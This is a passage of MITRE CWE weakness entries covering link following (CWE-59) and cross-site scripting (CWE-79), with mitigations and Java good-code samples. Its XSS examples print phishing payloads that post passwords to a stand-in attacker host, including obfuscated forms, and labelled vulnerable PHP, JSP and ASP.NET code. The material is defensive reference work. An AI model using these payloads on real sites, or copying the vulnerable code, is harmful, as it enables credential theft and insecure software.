[R.22.3] [REF-32] OWASP. "Testing for Path Traversal (OWASP-AZ-001)". <http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)>.
[R.22.4] Johannes Ullrich. "Top 25 Series - Rank 7 - Path Traversal". SANS Software Security Institute. 2010-03-09. <http://blogs.sans.org/appsecstreetfighter/2010/03/09/top-25-series-rank-7-path-traversal/>.
[R.22.5] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.22.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Filenames and Paths", Page 503. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-14CWE Content TeamMITREInternal
updated Description
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-07-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Observed_Examples
2013-07-17CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2014-06-23CWE Content TeamMITREInternal
updated Other_Notes, Research_Gaps
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2017-05-03CWE Content TeamMITREInternal
updated Demonstrative_Examples
Previous Entry Names
Change DatePrevious Entry Name
2010-02-16Path Traversal

CWE-59: Improper Link Resolution Before File Access ('Link Following')

Weakness ID: 59
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
+ Alternate Terms
insecure temporary file:

Some people use the phrase "insecure temporary file" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

Operating Systems

Windows: (Sometimes)

UNIX: (Often)

+ Common Consequences
ScopeEffect
Confidentiality
Integrity
Access Control

Technical Impact: Read files or directories; Modify files or directories; Bypass protection mechanism

An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism, then an attacker may be able to bypass the mechanism.

Technical Impact: Other

Remote Execution: Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since an ".LNK" file can be uploaded like a normal file.

+ Likelihood of Exploit

Low to Medium

+ Detection Methods

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR Partial

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Observed Examples
ReferenceDescription
Some versions of Perl follow symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.
Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.
Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.
Symlink attack allows local users to overwrite files.
Window manager does not properly handle when certain symbolic links point to "stale" locations, which could allow local users to create or truncate arbitrary files.
Second-order symlink vulnerabilities
Second-order symlink vulnerabilities
Symlink in Python program
Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.
Signal causes a dump that follows symlinks.
Hard link attack, file overwrite; interesting because program checks against soft links
Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.
Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.
Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.
Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.
Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.
Hard link race condition
Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment."
FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.
FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.
Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.
".LNK." - .LNK with trailing dot
Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link
File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.
Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Separation of Privilege

Follow the principle of least privilege when assigning access rights to entities in a software system.

Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
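
Beyond access control, a program can also check for links before operating on a file. The following Java sketch refuses to follow a symbolic link and confirms that the resolved path stays inside an expected directory; the directory and class name are assumptions for illustration, and a check-then-use sequence like this can still be subject to a race condition (CWE-363) on some filesystems.

(Good Code)
Example Language: Java 
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;

public class LinkAwareReader {

    // Assumed directory that the program intends to operate in.
    private static final Path BASE_DIR = Path.of("/var/app/data");

    public static InputStream openDataFile(String name) throws IOException {
        Path candidate = BASE_DIR.resolve(name);

        // Refuse to operate on a symbolic link at all.
        if (Files.isSymbolicLink(candidate)) {
            throw new IOException("refusing to follow a symbolic link");
        }

        // toRealPath() resolves any remaining links in parent directories;
        // the result must still be inside the base directory.
        Path real = candidate.toRealPath();
        if (!real.startsWith(BASE_DIR.toRealPath())) {
            throw new IOException("file resolves outside of the expected directory");
        }
        return Files.newInputStream(real);
    }
}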

+ Background Details

"Soft link" is a UNIX term that is synonymous with a simple shortcut on Windows-based platforms.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory21Pathname Traversal and Equivalence Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts (primary)1000
ChildOfCategoryCategory743CERT C Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory748CERT C Secure Coding Section 50 - POSIX (POS)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory980SFP Secondary Cluster: Link in Resource Name Resolution
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfCategoryCategory60UNIX Path Link Problems
Development Concepts (primary)699
ParentOfCompound Element: CompositeCompound Element: Composite61UNIX Symbolic Link (Symlink) Following
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant62UNIX Hard Link
Research Concepts (primary)1000
ParentOfCategoryCategory63Windows Path Link Problems
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant64Windows Shortcut Following (.LNK)
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant65Windows Hard Link
Research Concepts (primary)1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
CanFollowWeakness BaseWeakness Base363Race Condition Enabling Link Following
Research Concepts1000
+ Relationship Notes

Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations.

Some potential factors are race conditions, permissions, and predictability.

+ Research Gaps

UNIX hard links and Windows hard/soft links are under-studied and under-reported.

+ Affected Resources
  • File/Directory
+ Functional Areas
  • File processing, temporary files
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERLink Following
CERT C Secure CodingFIO02-CCanonicalize path names originating from untrusted sources
CERT C Secure CodingPOS01-CCheck for the existence of links when dealing with files
CERT C++ Secure CodingFIO02-CPPCanonicalize path names originating from untrusted sources
Software Fault PatternsSFP18Link in resource name resolution
+ References
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Symbolic Link Attacks", Page 518. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Description, Name
2009-10-29CWE Content TeamMITREInternal
updated Background_Details, Other_Notes
2010-02-16CWE Content TeamMITREInternal
updated Potential_Mitigations, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, Observed_Examples, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-06-23CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Link Following
2009-05-27Failure to Resolve Links Before File Access (aka 'Link Following')

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Weakness ID: 79
Abstraction: Base
Status: Usable
Presentation Filter:
+ Description

Description Summary

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Extended Description

Cross-site scripting (XSS) vulnerabilities occur when:

1. Untrusted data enters a web application, typically from a web request.

2. The web application dynamically generates a web page that contains this untrusted data.

3. During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.

4. A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.

5. Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain.

6. This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.

There are three main kinds of XSS:

Type 1: Reflected XSS (or Non-Persistent)

The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.

Type 2: Stored XSS (or Persistent)

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. The dangerous data is later read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

Type 0: DOM-Based XSS

In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as JavaScript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.

Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself, possibly taking over the victim's machine (sometimes referred to as "drive-by hacking").

In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.
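
The usual server-side defense is to encode untrusted data for the output context before it is written into the page. The following minimal Java sketch HTML-escapes a value before it is echoed into HTML body content; the hand-rolled escape method covers only the basic HTML metacharacters and stands in for a vetted encoding library.

(Good Code)
Example Language: Java 
// Minimal sketch: escape the characters that are significant in HTML body
// content before echoing untrusted data back to the user.
public class HtmlEscaper {

    public static String escapeHtml(String input) {
        StringBuilder out = new StringBuilder(input.length());
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}

Attribute, JavaScript, CSS, and URL contexts each require their own encoding rules, so a single HTML-body escaper such as this is not sufficient on its own.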

+ Alternate Terms
XSS
CSS:

"CSS" was once used as the acronym for this problem, but this could cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Web-based: (Often)

Technology Classes

Web-Server: (Often)

Platform Notes

XSS flaws are very common in web applications, since avoiding them requires a great deal of developer discipline.

+ Common Consequences
ScopeEffect
Access Control
Confidentiality

Technical Impact: Bypass protection mechanism; Read application data

The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also.

Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws.

Confidentiality
Integrity
Availability
Access Control

Technical Impact: Execute unauthorized code or commands; Bypass protection mechanism; Read application data

The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server.

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.

+ Likelihood of Exploit

High to Very High

+ Enabling Factors for Exploitation

Cross-site scripting attacks may occur anywhere that potentially malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users, commonly in places such as bulletin-board web sites that provide web-based mailing list-style functionality.

Stored XSS got its start with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code. As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response.

+ Detection Methods

Automated Static Analysis

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.

Effectiveness: Moderate

Black Box

Use the XSS Cheat Sheet [R.79.6] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.

Effectiveness: Moderate

With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store and then find the application functionality in which that string is sent to other users of the application. Because these are two distinct steps, the activation of the XSS can take place minutes, hours, or days after the string was originally injected into the data store.

+ Demonstrative Examples

Example 1

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.

(Bad Code)
Example Language: PHP 
$username = $_GET['username'];
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the URL of the page could be modified so that $username contains scripting syntax, such as:

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending his password to the attacker:

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div>

If a user clicks on this link, then welcome.php will generate the following HTML and send it to the user's browser:

(Result)
 
<div class="header"> Welcome,
<div id="stealPassword">Please Login:
<form name="input" action="attack.example.com/stealPassword.php" method="post">
Username: <input type="text" name="username" />
<br/>
Password: <input type="password" name="password" />
<input type="submit" value="Login" />
</form>
</div>
</div>

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):

(Attack)
 
trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22
stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input
%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php
%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text
%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A
+%3Cinput+type%3D%22password%22+name%3D%22password%22
+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:

(Attack)
 
trustedSite.example.com/welcome.php?username=<script+type="text/javascript">
document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Example 2

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

(Bad Code)
Example Language: JSP 
<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.

(Bad Code)
Example Language: ASP.NET 
...
protected System.Web.UI.WebControls.TextBox Login;
protected System.Web.UI.WebControls.Label EmployeeID;
...
EmployeeID.Text = Login.Text;
... (HTML follows) ...
<p><asp:label id="EmployeeID" runat="server" /></p>
...

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Example 3

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

(Bad Code)
Example Language: JSP 
<%
...
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from emp where id=" + eid);
if (rs != null) {
rs.next();
String name = rs.getString("name");
%>

Employee Name: <%= name %>
<% } %>

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.

(Bad Code)
Example Language: ASP.NET 
protected System.Web.UI.WebControls.Label EmployeeName;
...
string query = "select * from emp where id=" + eid;
sda = new SqlDataAdapter(query, conn);
sda.Fill(dt);
string name = dt.Rows[0]["Name"].ToString();
...
EmployeeName.Text = name;

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Example 4

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php

(Bad Code)
Example Language: PHP 
$username = mysql_real_escape_string($username);
$fullName = mysql_real_escape_string($fullName);
$query = sprintf('Insert Into users (username, password, fullname) Values ("%s", "%s", "%s")', $username, crypt($password), $fullName);
mysql_query($query);
// ...

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php

(Bad Code)
 
$query = 'Select * From users Where loggedIn=true';
$results = mysql_query($query);
if (!$results) {
exit;
}
//Print list of users to page
echo '<div id="userlist">Currently Active Users:';
while ($row = mysql_fetch_assoc($results)) {
echo '<div class="userNames">'.$row['fullname'].'</div>';
}
echo '</div>';

The attacker can set his name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password-stealing login form like the fake login box shown in Example 1.

+ Observed Examples
Reference | Description
Chain: protection mechanism failure allows XSS
Chain: only checks "javascript:" tag
Chain: only removes SCRIPT tags, enabling XSS
Reflected XSS using the PATH_INFO in a URL
Reflected XSS not properly handled when generating an error message
Reflected XSS sent through email message.
Stored XSS in a security product.
Stored XSS using a wiki page.
Stored XSS in a guestbook application.
Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.
Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:

  • HTML body

  • Element attributes (such as src="XYZ")

  • URIs

  • JavaScript sections

  • Cascading Style Sheets and style property

etc. Note that HTML Entity Encoding is only appropriate for the HTML body.

Consult the XSS Prevention Cheat Sheet [R.79.16] for more details on the types of encoding and escaping that are needed.
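
The sketch below illustrates HTML entity encoding for the HTML body context only; it is a minimal, illustrative helper, not part of any standard API, and the other contexts listed above still require their own dedicated encoders (for example, those provided by the OWASP ESAPI Encoding module).

(Good Code)
Example Language: Java 
// Minimal illustrative helper: entity-encode untrusted data for the HTML *body* context.
// Attribute, URL, JavaScript, and CSS contexts need different encoders.
public final class HtmlBodyEncoder {
    public static String encodeForHtmlBody(String input) {
        if (input == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(input.length());
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Example: a reflected username payload is rendered inert.
        String username = "<script>alert('XSS')</script>";
        System.out.println("Welcome, " + encodeForHtmlBody(username));
    }
}

Applied before untrusted data is written into the HTML body, such encoding causes injected markup like the script payload in Example 1 to be displayed as text rather than executed.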

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Effectiveness: Limited

This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Strategy: Parameterization

